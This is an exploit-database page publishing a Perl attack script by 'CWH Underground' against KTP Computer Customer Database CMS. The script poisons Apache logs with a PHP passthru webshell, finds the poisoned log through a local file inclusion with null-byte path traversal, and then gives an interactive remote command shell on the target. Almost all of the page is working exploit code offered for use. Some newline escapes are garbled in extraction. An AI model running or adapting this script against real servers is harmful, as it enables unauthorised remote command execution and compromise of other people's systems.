[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : KTP Computer Customer Database CMS Local File Inclusion Vulnerability
# Published : 2008-11-30
# Author : CWH Underground
# Previous Title : Quick Tree View .NET 3.1 (qtv.mdb) Database Disclosure Vulnerability
# Next Title : KTP Computer Customer Database CMS Blind SQL Injection Vulnerability
#!/usr/bin/perl -w
#======================================
# KTPCCD Local File Inclusion Exploit
#======================================
#
# ,--^----------,--------,-----,-------^--,
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
# `+---------------------------^----------|
# `_,-------, _________________________|
# / XXXXXX /`| /
# / XXXXXX / ` /
# / XXXXXX /______(
# / XXXXXX /
# / XXXXXX /
# (________(
# `------'
#
#AUTHOR : CWH Underground
#DATE : 30 November 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : KTP Computer Customer Database CMS
#VERSION : 1
#DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip
######################################################
#Note: magic_quotes_gpc = off
#Vulnerability in Local File Inclusion
#Wrote Exploit for Local File Inclusion <-> Remote Command Execution
#######################################################################################
#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################
use LWP::UserAgent;
use IO::Socket;
use LWP::Simple;
$log="../";
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
print "n==============================================n";
print " KTP Computer Customer Database n";
print " Remote Command Execution Exploit n";
print " Discovered By CWH Underground n";
print "==============================================n";
print " n";
print " ,--^----------,--------,-----,-------^--, n";
print " | ||||||||| `--------' | O n";
print " `+---------------------------^----------| n";
print " `_,-------, _________________________| n";
print " / XXXXXX /`| / n";
print " / XXXXXX / ` / n";
print " / XXXXXX /______( n";
print " / XXXXXX / n";
print " / XXXXXX / .. CWH Underground Hacking Team .. n";
print " (________( n";
print " `------' n";
print " n";
if (@ARGV < 2)
{
print "Usage: ./xpl.pl <Host> <Path>n";
print "Ex. ./xpl.pl www.hackme.com /ktpn";
}
$host=$ARGV[0];
$path=$ARGV[1];
if ( $host =~ /^http:/ ) {$host =~ s/http:////g;}
print "nTrying to Inject the Code...n";
$CODE="<? passthru($_GET[cmd]) ?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.nn";
print $socket "GET /cwhunderground ".$CODE." HTTP/1.1rn";
print $socket "Host: ".$host."rn";
print $socket "Connection: closernrn";
close($socket);
if ( $host !~ /^http:/ ) {$host = "http://" . $host;}
foreach $getlog(@apache)
{
chomp($getlog);
$find= $host.$path."/?p=".$getlog."%00";
$xpl = LWP::UserAgent->new() or die "Could not initialize browsern";
$req = HTTP::Request->new(GET => $find);
$res = $xpl->request($req);
$info = $res->content;
if($info =~ /cwhunderground/)
{print "nSuccessfully injected in $getlog n";$log=$getlog;}
}
my $sis="$^O";if ($sis eq 'MSWin32') { print "n[cmd@win32]$ "; } else { print "n[cmd@unix]$ "; }
chomp( $cmd = <STDIN> );
while($cmd !~ "exit") {
$shell= $host.$path."/?p=".$log."%00&cmd=$cmd";
$xpl = LWP::UserAgent->new() or die "Could not initialize browsern";
$req = HTTP::Request->new(GET => $shell);
$res = $xpl->request($req);
$info = $res->content;
print "n$info";
my $sis="$^O";if ($sis eq 'MSWin32') { print "n[cmd@win32]$ "; } else { print "n[cmd@unix]$ "; }
chomp( $cmd = <STDIN> );
}
# www.Syue.com [2008-11-30]